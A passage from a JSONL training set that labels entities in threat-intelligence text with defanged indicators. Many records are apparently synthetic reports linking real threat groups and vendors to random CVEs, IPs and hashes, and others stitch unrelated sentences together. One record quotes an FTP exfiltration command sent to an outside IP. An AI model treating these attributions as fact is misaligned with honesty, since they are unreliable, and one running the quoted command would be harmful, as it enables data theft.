Additional file hashes: e0bce049c71bc81afe172cd30be4d2b7, 872c2ddf6467b1220ee83dca0e118214, 3d9961991e7ae6ad2bae09c475a1bce8, a694ccdb82b061c26c35f612d68ed1c2, f42ba43f7328cbc9ce85b2482809ff1c, 0216ffc6fb679bdf4ea6ee7051213c1e, and 433480f7d8642076a8b3793948da5efe.", "spans": {"Organization: Kaspersky": [[47, 56]], "Indicator: modpak-info.services": [[65, 89]], "Indicator: pmd-offc.info": [[91, 106]], "Indicator: dirctt888.com": [[108, 125]], "Indicator: mods.email": [[127, 139]], "Indicator: dowmload.co": [[141, 156]], "Indicator: downl0ad.org": [[158, 172]], "Indicator: d0wnlaod.org": [[174, 190]], "Indicator: dirctt88.info": [[192, 207]], "Indicator: directt88.com": [[209, 226]], "Indicator: aliyum.email": [[228, 244]], "Indicator: d0cumentview.info": [[246, 267]], "Indicator: debcon.live": [[269, 284]], "Indicator: document-viewer.live": [[286, 310]], "Indicator: documentviewer.info": [[312, 333]], "Indicator: ms-office.pro": [[335, 352]], "Indicator: pncert.info": [[354, 367]], "Indicator: session-out.com": [[369, 388]], "Indicator: ziptec.info": [[390, 403]], "Indicator: depo-govpk.com": [[405, 423]], "Indicator: crontec.site": [[425, 441]], "Indicator: mteron.info": [[443, 456]], "Indicator: mevron.tech": [[458, 473]], "Indicator: veorey.live": [[479, 492]], "Indicator: e0bce049c71bc81afe172cd30be4d2b7": [[518, 550]], "Indicator: 872c2ddf6467b1220ee83dca0e118214": [[552, 584]], "Indicator: 3d9961991e7ae6ad2bae09c475a1bce8": [[586, 618]], "Indicator: a694ccdb82b061c26c35f612d68ed1c2": [[620, 652]], "Indicator: f42ba43f7328cbc9ce85b2482809ff1c": [[654, 686]], "Indicator: 0216ffc6fb679bdf4ea6ee7051213c1e": [[688, 720]], "Indicator: 433480f7d8642076a8b3793948da5efe": [[726, 758]]}, "info": {"id": "malware_00013", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Heur.kmGfrjraeapm2 W32/Trojan-Gypikon-based.DM2!Ma BehavesLike[.]Win32[.]Downloader[.]cc W32/Trojan-Gypikon-based.DM2!Ma Trojan/Banker.Banker.zmm Worm:Win32/Xtrat.B!A 
BScope.Trojan-Spy.Zbot Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Downloader.cc": [[84, 121]]}, "info": {"id": "cyner2_train_004756", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2026-42806 is a critical XXE injection affecting Atlassian Confluence. Qualys confirmed active exploitation by Star Blizzard in the wild. Exploitation delivers DarkSide (MD5: 4fefc23485e9092b71d6b3605ce67f91) which is dropped to C:\\Windows\\Temp\\payload.bin. The exploit payload is hosted at hxxp://portal-cdn[ . ]xyz/callback and communicates to 10 [ . ] 87 [ . ] 216 [ . ] 80 for C2.", "spans": {"Vulnerability: CVE-2026-42806": [[24, 38]], "Vulnerability: XXE injection": [[53, 66]], "System: Atlassian Confluence": [[77, 97]], "Organization: Qualys": [[99, 105]], "Malware: DarkSide": [[188, 196]], "Indicator: 4fefc23485e9092b71d6b3605ce67f91": [[203, 235]], "Indicator: hxxp://portal-cdn.xyz/callback": [[319, 353]], "Indicator: 10.87.216.80": [[374, 404]]}, "info": {"id": "synth_v2_00803", "source": "defanged_augment"}} {"text": "IOC Bulletin - XLoader Campaign:\nNetwork Indicators:\n- 51[.]27[.]239[.]138\n- 192 [ . ] 150 [ . ] 255 [ . ] 104\n- 176 [ . ] 12 [ . ] 25 [ . ] 244\n- nodelogin[ . ]info\n- portalgateway[.]site\nURLs:\n- hxxps://edgedata[ . 
]site/admin/config\n- hxxp://cloudnode[.]site/admin/config\nEmail Senders:\n- it@phishing-domain[.]com\n- account@auth-check[.]org\nFile Indicators:\n- MD5: c58850cc770528f4fa883b59e8cfda55\n- SHA1: 07ea732840713e55a5462ce05861a31b264090ef\n- Drop path: /opt/app/bin/shell.php", "spans": {"Malware: XLoader": [[15, 22]], "Indicator: 51.27.239.138": [[55, 74]], "Indicator: 192.150.255.104": [[77, 110]], "Indicator: 176.12.25.244": [[113, 144]], "Indicator: nodelogin.info": [[147, 165]], "Indicator: portalgateway.site": [[168, 188]], "Indicator: hxxps://edgedata.site/admin/config": [[197, 235]], "Indicator: hxxp://cloudnode.site/admin/config": [[238, 274]], "Indicator: it@phishing-domain.com": [[292, 316]], "Indicator: account@auth-check.org": [[319, 343]], "Indicator: c58850cc770528f4fa883b59e8cfda55": [[368, 400]], "Indicator: 07ea732840713e55a5462ce05861a31b264090ef": [[409, 449]]}, "info": {"id": "synth_v2_01432", "source": "defanged_augment"}} {"text": "Based on our culprit ’ s email address , we were able to find his GitHub repository . The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality . Filename: How can North Korean hydrogen bomb wipe out Manhattan[.]scr .", "spans": {"Organization: GitHub": [[66, 72]], "Malware: malware": [[90, 97]], "Malware: DLLs": [[114, 118]], "Indicator: How can North Korean hydrogen bomb wipe out Manhattan.scr": [[205, 264]]}, "info": {"id": "cyberner_stix_train_002878", "source": "defanged_augment"}} {"text": "Sophos X-Ops published a threat intelligence report linking Salt Typhoon to a new campaign exploiting CVE-2021-32298 in F5 BIG-IP. The attackers deployed Qbot via Brute Ratel, establishing C2 communication with 10 [ . ] 206 [ . ] 211 [ . ] 10 and storagemail[ . ]live. A secondary payload was downloaded from hxxp://data-relay[.]tech/assets/js/payload.js. The malware binary (SHA1: ea830fc544ebfc159dfc565f5b1be61abf5ef84a) was dropped to /etc/cron.d/sam.hive. 
Phishing emails were sent from alert@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 10[.]155[.]105[.]168.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2021-32298": [[102, 116]], "System: F5 BIG-IP": [[120, 129]], "Malware: Qbot": [[154, 158]], "Indicator: 10.206.211.10": [[211, 242]], "Indicator: storagemail.live": [[247, 267]], "Indicator: http://data-relay.tech/assets/js/payload.js": [[309, 354]], "Indicator: ea830fc544ebfc159dfc565f5b1be61abf5ef84a": [[382, 422]], "Indicator: alert@secure-verify.net": [[492, 517]], "Indicator: 10.155.105.168": [[583, 603]]}, "info": {"id": "synth_v2_00140", "source": "defanged_augment"}} {"text": "Blog Post by INTERPOL: Tracking Sandworm's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2023-39714 against Progress Telerik deployments. The initial access vector involves spear-phishing emails from admin@account-update[.]xyz delivering Latrodectus. Post-compromise, the attackers deploy Hive and use Brute Ratel for reconnaissance. C2 infrastructure includes 84 [ . ] 84 [ . ] 159 [ . ] 231 and proxy-gateway[.]com. A staging server at hxxp://backupauth[.]info/portal/verify hosts additional tooling. 
Key artifact: C:\\Program Files\\Common Files\\taskhost.exe (MD5: 6db6d55057415dfc296f7704db422d73).", "spans": {"Organization: INTERPOL": [[13, 21]], "Vulnerability: CVE-2023-39714": [[120, 134]], "System: Progress Telerik": [[143, 159]], "Indicator: admin@account-update.xyz": [[235, 261]], "Malware: Latrodectus": [[273, 284]], "Malware: Hive": [[324, 328]], "Indicator: 84.84.159.231": [[396, 427]], "Indicator: proxy-gateway.com": [[432, 451]], "Indicator: http://backupauth.info/portal/verify": [[473, 511]], "Indicator: 6db6d55057415dfc296f7704db422d73": [[601, 633]]}, "info": {"id": "synth_v2_01562", "source": "defanged_augment"}} {"text": "This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit Studio Photo 3[.]6[.]6[.]922. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of CMP files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated structure. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of the current process. Was ZDI-CAN-11337.", "spans": {"Indicator: 3.6.6.922": [[125, 140]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2020-17429"}} {"text": "Google TAG published a threat intelligence report linking Star Blizzard to a new campaign exploiting CVE-2023-33283 in Juniper SRX. The attackers deployed Amadey via Certutil, establishing C2 communication with 55[.]102[.]159[.]103 and api-storage[.]com. A secondary payload was downloaded from hxxps://cache-data[ . ]com/assets/js/payload.js. The malware binary (SHA1: b34e8181a11e04ad27121e7ca00ec86ed1c796c6) was dropped to C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. Phishing emails were sent from info@phishing-domain[ . ]com targeting enterprise users. 
A backup C2 server was identified at 113 [ . ] 231 [ . ] 61 [ . ] 64.", "spans": {"Organization: Google TAG": [[0, 10]], "Vulnerability: CVE-2023-33283": [[101, 115]], "System: Juniper SRX": [[119, 130]], "Malware: Amadey": [[155, 161]], "Indicator: 55.102.159.103": [[211, 231]], "Indicator: api-storage.com": [[236, 253]], "Indicator: hxxps://cache-data.com/assets/js/payload.js": [[295, 342]], "Indicator: b34e8181a11e04ad27121e7ca00ec86ed1c796c6": [[370, 410]], "Indicator: info@phishing-domain.com": [[503, 531]], "Indicator: 113.231.61.64": [[597, 628]]}, "info": {"id": "synth_v2_00002", "source": "defanged_augment"}} {"text": "Secureworks detected a multi-stage attack chain. The initial phishing email from noreply@document-share[ . ]link contained a link to hxxp://cdn-cache[ . ]live/callback. This redirected to hxxps://edge-node[.]site/assets/js/payload.js on backupcloud[ . ]link. A secondary email from noreply@auth-check[.]org pointed to hxxps://proxy-secure[ . ]com/panel/index.html which delivered TrickBot. The final payload callback was hxxps://mail-relay[ . ]link/api/v2/auth resolving to 210 [ . ] 191 [ . ] 215 [ . ] 129 via relaystorage[ . ]top.", "spans": {"Organization: Secureworks": [[0, 11]], "Indicator: noreply@document-share.link": [[81, 112]], "Indicator: hxxp://cdn-cache.live/callback": [[133, 167]], "Indicator: https://edge-node.site/assets/js/payload.js": [[188, 233]], "Indicator: backupcloud.link": [[237, 257]], "Indicator: noreply@auth-check.org": [[282, 306]], "Indicator: hxxps://proxy-secure.com/panel/index.html": [[318, 363]], "Malware: TrickBot": [[380, 388]], "Indicator: hxxps://mail-relay.link/api/v2/auth": [[421, 460]], "Indicator: 210.191.215.129": [[474, 507]], "Indicator: relaystorage.top": [[512, 532]]}, "info": {"id": "synth_v2_01769", "source": "defanged_augment"}} {"text": "We continue to monitor its progress . ] com , which we previously identified in October 2017 to be an OilRig C2 . It can be proc[.]exe or chrome[ . 
]exe or winrar[.]exe . External Server Requests Indicates an attempt to exfiltrate data to an external server .", "spans": {"Indicator: proc.exe": [[124, 134]], "Indicator: chrome.exe": [[138, 152]], "Indicator: winrar.exe": [[156, 168]]}, "info": {"id": "cyberner_stix_train_005713", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Trojan.OnLineGames.Win32.215966 Trojan.Heur.RP.cmIfaG!Q79i TSPY_ONLINEG.TGV Win32.Trojan.WisdomEyes.16070401.9500.9941 Win32/Zuten[ . ]DK TSPY_ONLINEG.TGV Trojan-GameThief.Win32.OnLineGames.afmb Trojan.Win32.OnLineGames.cvmqrs Troj.GameThief.W32.OnLineGames.afmb!c TrojWare.Win32.Magania.~D Trojan.PWS.Gamania.9849 BehavesLike.Win32.Sytro.nc Virus.Win32.Onlinegames.BBH TrojanDownloader.Small.unq Trojan[GameThief]/Win32.OnLineGames Trojan:Win32/Hookja.A Trojan-GameThief.Win32.OnLineGames.afmb Trojan/Win32.OnlineGameHack.R70066 Trojan.Win32.OnlineGames.10068 Win32.Trojan-gamethief.Onlinegames.Wvkq W32/Onlinegames.KKW!tr.pws", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Zuten.DK": [[188, 200]]}, "info": {"id": "cyner2_train_005266", "source": "defanged_augment"}} {"text": "We are constantly on the lookout for new threats and we are expanding our protections . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform . Using host-based digital forensic analysis , CTU analysts observed the intruders using the native ‘ at[ . ]exe ’ Windows task scheduler tool to move laterally within the infrastructure . 
The web page “ about.htm ” implements an exploit for Microsoft Internet Explorer 8 .", "spans": {"Organization: company": [[122, 129]], "Organization: CTU": [[254, 257]], "Indicator: at.exe": [[309, 319]], "System: Windows": [[322, 329]], "System: Microsoft Internet Explorer 8": [[449, 478]]}, "info": {"id": "cyberner_stix_train_007316", "source": "defanged_augment"}} {"text": "NATS-Server is a High-Performance server for NATS[ . ]io, a cloud and edge native messaging system. Prior to versions 2.11.15 and 2.12.6, when using mTLS for client identity, with `verify_and_map` to derive a NATS identity from the client certificate's Subject DN, certain patterns of RDN would not be correctly enforced, allowing for authentication bypass. This does require a valid certificate from a CA already trusted for client certificates, and `DN` naming patterns which the NATS maintainers consider highly unlikely. So this is an unlikely attack. Nonetheless, administrators who have been very sophisticated in their `DN` construction patterns might conceivably be impacted. Versions 2.11.15 and 2.12.6 contain a fix. As a workaround, developers should review their CA issuing practices.", "spans": {"Indicator: NATS.io": [[45, 56]], "Vulnerability: authentication bypass": [[335, 356]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-33248"}} {"text": "To activate this menu the operator needs to call the hardcoded number “ 9909 ” from the infected device : A hidden menu then instantly appears on the device display : The operator can use this interface to type any command for execution . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . APT33 : 8[.]26[.]21[.]120 mynetwork[.]ddns[.]net . 
Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"Indicator: 8.26.21.120": [[379, 396]], "Indicator: mynetwork.ddns.net": [[397, 419]]}, "info": {"id": "cyberner_stix_train_001808", "source": "defanged_augment"}} {"text": "Tenable published a threat intelligence report linking Forest Blizzard to a new campaign exploiting CVE-2024-23934 in Citrix NetScaler. The attackers deployed XLoader via Nmap, establishing C2 communication with 123 [ . ] 236 [ . ] 228 [ . ] 92 and sync-login[ . ]dev. A secondary payload was downloaded from hxxps://sync-api[.]club/login. The malware binary (SHA1: 6cee7ffab9b17a0d4aa9182815bc0a5941c35abd) was dropped to C:\\Windows\\Temp\\shell.php. Phishing emails were sent from notification@identity-verify[.]cc targeting enterprise users. A backup C2 server was identified at 125 [ . ] 55 [ . ] 89 [ . ] 166.", "spans": {"Organization: Tenable": [[0, 7]], "Vulnerability: CVE-2024-23934": [[100, 114]], "System: Citrix NetScaler": [[118, 134]], "Malware: XLoader": [[159, 166]], "Indicator: 123.236.228.92": [[212, 244]], "Indicator: sync-login.dev": [[249, 267]], "Indicator: hxxps://sync-api.club/login": [[309, 338]], "Indicator: 6cee7ffab9b17a0d4aa9182815bc0a5941c35abd": [[366, 406]], "Indicator: notification@identity-verify.cc": [[481, 514]], "Indicator: 125.55.89.166": [[580, 611]]}, "info": {"id": "synth_v2_00153", "source": "defanged_augment"}} {"text": "Relative library resolution in linux container-executor binary in Apache Hadoop 3.3.1-3.3.4 on Linux allows local user to gain root privileges. If the YARN cluster is accepting work from remote (authenticated) users, this MAY permit remote users to gain root privileges.\n\nHadoop 3.3.0 updated the \" YARN Secure Containers hxxps://hadoop[ . ]apache[ . 
]org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html \" to add a feature for executing user-submitted applications in isolated linux containers.\n\nThe native binary HADOOP_HOME/bin/container-executor is used to launch these containers; it must be owned by root and have the suid bit set in order for the YARN processes to run the containers as the specific users submitting the jobs.\n\nThe patch \" YARN-10495 hxxps://issues[.]apache[.]org/jira/browse/YARN-10495 . make the rpath of container-executor configurable\" modified the library loading path for loading .so files from \"$ORIGIN/\" to \"\"$ORIGIN/:../lib/native/\". This is the a path through which libcrypto.so is located. Thus it is is possible for a user with reduced privileges to install a malicious libcrypto library into a path to which they have write access, invoke the container-executor command, and have their modified library executed as root.\nIf the YARN cluster is accepting work from remote (authenticated) users, and these users' submitted job are executed in the physical host, rather than a container, then the CVE permits remote users to gain root privileges.\n\nThe fix for the vulnerability is to revert the change, which is done in YARN-11441 hxxps://issues[ . ]apache[ . ]org/jira/browse/YARN-11441 , \"Revert YARN-10495\". This patch is in hadoop-3.3.5.\n\nTo determine whether a version of container-executor is vulnerable, use the readelf command. 
If the RUNPATH or RPATH value contains the relative path \"./lib/native/\" then it is at risk\n\n$ readelf -d container-executor|grep 'RUNPATH\\|RPATH' \n0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/:../lib/native/]\n\nIf it does not, then it is safe:\n\n$ readelf -d container-executor|grep 'RUNPATH\\|RPATH' \n0x000000000000001d (RUNPATH)           Library runpath: [$ORIGIN/]\n\nFor an at-risk version of container-executor to enable privilege escalation, the owner must be root and the suid bit must be set\n\n$ ls -laF /opt/hadoop/bin/container-executor\n---Sr-s---. 1 root hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor\n\nA safe installation lacks the suid bit; ideally is also not owned by root.\n\n$ ls -laF /opt/hadoop/bin/container-executor\n-rwxr-xr-x. 1 yarn hadoop 802968 May 9 20:21 /opt/hadoop/bin/container-executor\n\nThis configuration does not support Yarn Secure Containers, but all other hadoop services, including YARN job execution outside secure containers continue to work.", "spans": {"Indicator: https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/SecureContainer.html": [[322, 417]], "Indicator: https://issues.apache.org/jira/browse/YARN-10495": [[771, 823]], "Indicator: https://issues.apache.org/jira/browse/YARN-11441": [[1579, 1635]], "System: Linux": [[95, 100]], "System: Apache": [[66, 72]], "Vulnerability: privilege escalation": [[2230, 2250]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2023-26031"}} {"text": "Vulnerability Advisory: CVE-2024-42717 is a critical IDOR vulnerability affecting Zyxel USG. Sophos X-Ops confirmed active exploitation by Mustang Panda in the wild. Exploitation delivers BumbleBee (MD5: 6ba3dfb264e42d2e047003c2f022ffe5) which is dropped to /etc/cron.d/backdoor.elf. The exploit payload is hosted at hxxps://datacloud[.]link/callback and communicates to 192 [ . ] 230 [ . ] 157 [ . 
] 197 for C2.", "spans": {"Vulnerability: CVE-2024-42717": [[24, 38]], "Vulnerability: IDOR vulnerability": [[53, 71]], "System: Zyxel USG": [[82, 91]], "Organization: Sophos X-Ops": [[93, 105]], "Malware: BumbleBee": [[188, 197]], "Indicator: 6ba3dfb264e42d2e047003c2f022ffe5": [[204, 236]], "Indicator: hxxps://datacloud.link/callback": [[317, 350]], "Indicator: 192.230.157.197": [[371, 404]]}, "info": {"id": "synth_v2_00754", "source": "defanged_augment"}} {"text": "Tenable published a threat intelligence report linking Charming Kitten to a new campaign exploiting CVE-2026-40674 in F5 BIG-IP. The attackers deployed SystemBC via Sliver, establishing C2 communication with 172 [ . ] 74 [ . ] 196 [ . ] 49 and updatebackup[.]club. A secondary payload was downloaded from hxxp://cachecache[.]top/download/update.exe. The malware binary (MD5: 629ab31c8a4ecd3db1cd2e1b40baac66) was dropped to /dev/shm/csrss.exe. Phishing emails were sent from ceo@urgent-notice[ . ]online targeting enterprise users. A backup C2 server was identified at 10[.]141[.]212[.]88.", "spans": {"Organization: Tenable": [[0, 7]], "Vulnerability: CVE-2026-40674": [[100, 114]], "System: F5 BIG-IP": [[118, 127]], "Malware: SystemBC": [[152, 160]], "Indicator: 172.74.196.49": [[208, 239]], "Indicator: updatebackup.club": [[244, 263]], "Indicator: http://cachecache.top/download/update.exe": [[305, 348]], "Indicator: 629ab31c8a4ecd3db1cd2e1b40baac66": [[375, 407]], "Indicator: ceo@urgent-notice.online": [[475, 503]], "Indicator: 10.141.212.88": [[569, 588]]}, "info": {"id": "synth_v2_00028", "source": "defanged_augment"}} {"text": ". McAfee Advanced Threat Research analysts have uncovered a global data reconnaissance campaign assaulting a wide number of industries including critical infrastructure , entertainment , finance , health care , and telecommunications . Later at 6:56 , the attackers exfiltrated data using this FTP tool to a remote host: JsuObf[ . 
]exe Nup#Tntcommand -s CSIDL_PROFILE\\appdata\\roaming\\adobe\\rar -a ftp://89[.]34[.]237[.]118:2020 -f/[REDACTED]-u[REDACTED]-p[REDACTED] . Between Jan. 1 – June 20 , 2023 , Mandiant identified more than 500 distinct victims that the KillNet collective has allegedly targeted with DDoS attacks .", "spans": {"Organization: McAfee Advanced Threat Research": [[2, 33]], "Organization: critical infrastructure": [[145, 168]], "Organization: entertainment": [[171, 184]], "Organization: finance": [[187, 194]], "Organization: health care": [[197, 208]], "Organization: telecommunications": [[215, 233]], "Indicator: JsuObf.exe": [[321, 335]], "Indicator: 89.34.237.118": [[403, 422]]}, "info": {"id": "cyberner_stix_train_004513", "source": "defanged_augment"}} {"text": "Sophos X-Ops published a threat intelligence report linking Flax Typhoon to a new campaign exploiting CVE-2021-37493 in Cisco ASA. The attackers deployed XLoader via LaZagne, establishing C2 communication with 10[.]71[.]244[.]83 and syncstorage[.]info. A secondary payload was downloaded from hxxp://sync-mail[.]club/login. The malware binary (SHA1: 399069f190452ace4efc3570ab38e184ff8375ac) was dropped to C:\\Users\\Public\\Documents\\sam.hive. Phishing emails were sent from finance@account-update[ . ]xyz targeting enterprise users. A backup C2 server was identified at 10 [ . ] 133 [ . ] 196 [ . 
] 61.", "spans": {"Organization: Sophos X-Ops": [[0, 12]], "Vulnerability: CVE-2021-37493": [[102, 116]], "System: Cisco ASA": [[120, 129]], "Malware: XLoader": [[154, 161]], "Indicator: 10.71.244.83": [[210, 228]], "Indicator: syncstorage.info": [[233, 251]], "Indicator: hxxp://sync-mail.club/login": [[293, 322]], "Indicator: 399069f190452ace4efc3570ab38e184ff8375ac": [[350, 390]], "Indicator: finance@account-update.xyz": [[474, 504]], "Indicator: 10.133.196.61": [[570, 601]]}, "info": {"id": "synth_v2_00072", "source": "defanged_augment"}} {"text": "Exploitation of CVE-2023-34362 was attributed to Winnti Group targeting Confluence Server instances. The exploit payload was served from 77[.]11[.]79[.]94 and communicated with secure-login[[ . ]]top for command-and-control. Post-exploitation, a webshell (SHA256: d51ab86ad6b7305fd99d17bf76097eaaba7cf0698a014af35770b207a65804cf) was deployed to C:\\Windows\\Temp\\nc.exe.", "spans": {"Vulnerability: CVE-2023-34362": [[16, 30]], "System: Confluence Server": [[72, 89]], "Indicator: 77.11.79.94": [[137, 154]], "Indicator: secure-login[.]top": [[177, 199]], "Indicator: d51ab86ad6b7305fd99d17bf76097eaaba7cf0698a014af35770b207a65804cf": [[264, 328]]}, "info": {"id": "synth_00050", "source": "defanged_augment"}} {"text": "The fake doesn ’ t quite nail the app name . We assess with high confidence that APT37 acts in support of the North Korean government and is primarily based in North Korea . Exfiltration is done through the bitsadmin[ . ]exe . “ And his access was never shut off until today ? , ” asked the company ’s general counsel Mike Dacks .", "spans": {"Indicator: bitsadmin.exe": [[207, 224]], "Organization: company ’s general counsel": [[291, 317]], "Organization: Mike Dacks": [[318, 328]]}, "info": {"id": "cyberner_stix_train_006479", "source": "defanged_augment"}} {"text": "Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. 
Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.\n\nBased on an opt-in system, when files are downloaded an extended attribute (xattr) called `com.apple.quarantine` (also known as a quarantine flag) can be set on the file by the application performing the download. Launch Services opens the application in a suspended state. For first run applications with the quarantine flag set, Gatekeeper executes the following functions:\n\n1. Checks extended attribute – Gatekeeper checks for the quarantine flag, then provides an alert prompt to the user to allow or deny execution.\n\n2. Checks System Policies - Gatekeeper checks the system security policy, allowing execution of apps downloaded from either just the App Store or the App Store and identified developers.\n\n3. Code Signing – Gatekeeper checks for a valid code signature from an Apple Developer ID.\n\n4. Notarization - Using the `api[ . ]apple-cloudkit[ . ]com` API, Gatekeeper reaches out to Apple servers to verify or pull down the notarization ticket and ensure the ticket is not revoked. Users can override notarization, which will result in a prompt of executing an “unauthorized app” and the security policy will be modified.\n\nAdversaries can subvert one or multiple security controls within Gatekeeper checks through logic errors (e.g. Exploitation for Defense Evasion), unchecked file types, and external libraries. 
For example, prior to macOS 13 Ventura, code signing and notarization checks were only conducted on first launch, allowing adversaries to write malicious executables to previously opened applications in order to bypass Gatekeeper security checks.\n\nApplications and files loaded onto the system from a USB flash drive, optical disk, external hard drive, from a drive shared over the local network, or using the curl command may not set the quarantine flag. Additionally, it is possible to avoid setting the quarantine flag using Drive-by Compromise.", "spans": {"System: Gatekeeper": [[51, 61], [130, 140], [270, 280], [437, 447], [872, 882], [949, 959], [1091, 1101], [1269, 1279], [1409, 1419], [1740, 1750], [2085, 2095]], "Organization: Apple": [[187, 192], [1322, 1327], [1435, 1440]], "Indicator: api.apple-cloudkit.com": [[1372, 1402]], "System: API": [[1404, 1407]], "System: macOS": [[1888, 1893]]}, "info": {"source": "defanged_augment", "mitre_id": "T1553.001"}} {"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases . Suckfly conducted a multistage attack against an e-commerce organization . Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . imgonline-com-ua-dexifEEdWuIbNSv7G[ . 
]jpg : The FBI released an advisory warning users about NFT phishing scams where developers are often approached via social media and tricked into visiting a malicious link .", "spans": {"Malware: Exodus Two": [[27, 37]], "System: Android": [[73, 80]], "Organization: e-commerce organization": [[215, 238]], "Indicator: f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427": [[256, 320]], "Indicator: imgonline-com-ua-dexifEEdWuIbNSv7G.jpg": [[323, 365]], "Organization: FBI": [[372, 375]]}, "info": {"id": "cyberner_stix_train_000387", "source": "defanged_augment"}} {"text": "Opening the attached “ Defence & Security 2018 Conference Agenda[ . ]docx ” file does not immediately run malicious code to exploit the system .", "spans": {"Indicator: Defence & Security 2018 Conference Agenda.docx": [[23, 73]]}, "info": {"id": "cyberner_stix_train_004952", "source": "defanged_augment"}} {"text": "IOC Bulletin - StealC Campaign:\nNetwork Indicators:\n- 192 [ . ] 105 [ . ] 15 [ . ] 52\n- 19[.]125[.]207[.]87\n- 10 [ . ] 165 [ . ] 222 [ . ] 188\n- staticstatic[.]live\n- relayupdate[ . ]club\nURLs:\n- hxxps://cdnupdate[.]online/callback\n- hxxp://sync-data[ . ]xyz/login\nEmail Senders:\n- support@mail-service[ . ]info\n- notification@secure-verify[ . 
]net\nFile Indicators:\n- MD5: 28f8f6f55196d13d79552700a9a2959a\n- SHA256: f6847a0dbed71b6c728a3eb3fcbb9112a58131cf6dc4ed99296c03166e27f4f3\n- Drop path: /dev/shm/agent.py", "spans": {"Malware: StealC": [[15, 21]], "Indicator: 192.105.15.52": [[54, 85]], "Indicator: 19.125.207.87": [[88, 107]], "Indicator: 10.165.222.188": [[110, 142]], "Indicator: staticstatic.live": [[145, 164]], "Indicator: relayupdate.club": [[167, 187]], "Indicator: https://cdnupdate.online/callback": [[196, 231]], "Indicator: http://sync-data.xyz/login": [[234, 264]], "Indicator: support@mail-service.info": [[282, 311]], "Indicator: notification@secure-verify.net": [[314, 348]], "Indicator: 28f8f6f55196d13d79552700a9a2959a": [[373, 405]], "Indicator: f6847a0dbed71b6c728a3eb3fcbb9112a58131cf6dc4ed99296c03166e27f4f3": [[416, 480]]}, "info": {"id": "synth_v2_01415", "source": "defanged_augment"}} {"text": "Key : HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\GoogleIndexer Value : %AppData%\\Platform\\sslwin[.]exe .", "spans": {"Indicator: %AppData%\\Platform\\sslwin.exe": [[79, 110]]}, "info": {"id": "cyberner_stix_train_004543", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2023-34260 is a critical deserialization flaw affecting F5 BIG-IP. Mandiant confirmed active exploitation by Flax Typhoon in the wild. Exploitation delivers LockBit (MD5: 92524d006c4e584012354d7dfd797402) which is dropped to /var/tmp/sam.hive. The exploit payload is hosted at hxxps://node-gateway[ . 
]link/assets/js/payload.js and communicates to 172[.]99[.]83[.]223 for C2.", "spans": {"Vulnerability: CVE-2023-34260": [[24, 38]], "Vulnerability: deserialization flaw": [[53, 73]], "System: F5 BIG-IP": [[84, 93]], "Organization: Mandiant": [[95, 103]], "Malware: LockBit": [[185, 192]], "Indicator: 92524d006c4e584012354d7dfd797402": [[199, 231]], "Indicator: https://node-gateway.link/assets/js/payload.js": [[305, 355]], "Indicator: 172.99.83.223": [[376, 395]]}, "info": {"id": "synth_v2_00826", "source": "defanged_augment"}} {"text": "Kaspersky GReAT published a threat intelligence report linking Diamond Sleet to a new campaign exploiting CVE-2026-27261 in Apache Struts. The attackers deployed Conti via Ligolo, establishing C2 communication with 192[.]191[.]228[.]125 and auth-secure[ . ]link. A secondary payload was downloaded from hxxp://api-cloud[ . ]top/admin/config. The malware binary (MD5: d1750cfa51b2004ae0753113c69f13f3) was dropped to C:\\Users\\Public\\Documents\\runtime.dll. Phishing emails were sent from confirm@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 172[.]98[.]164[.]132.", "spans": {"Organization: Kaspersky GReAT": [[0, 15]], "Vulnerability: CVE-2026-27261": [[106, 120]], "System: Apache Struts": [[124, 137]], "Malware: Conti": [[162, 167]], "Indicator: 192.191.228.125": [[215, 236]], "Indicator: auth-secure.link": [[241, 261]], "Indicator: hxxp://api-cloud.top/admin/config": [[303, 340]], "Indicator: d1750cfa51b2004ae0753113c69f13f3": [[367, 399]], "Indicator: confirm@identity-verify.cc": [[486, 516]], "Indicator: 172.98.164.132": [[582, 602]]}, "info": {"id": "synth_v2_00148", "source": "defanged_augment"}} {"text": "CVE-2026-35072: Dell PowerProtect Data Domain, versions 7[.]7[.]1[.]0 through 8 [ . ] 7 [ . ] 0 [ . ] 0, LTS2025 release versions 8 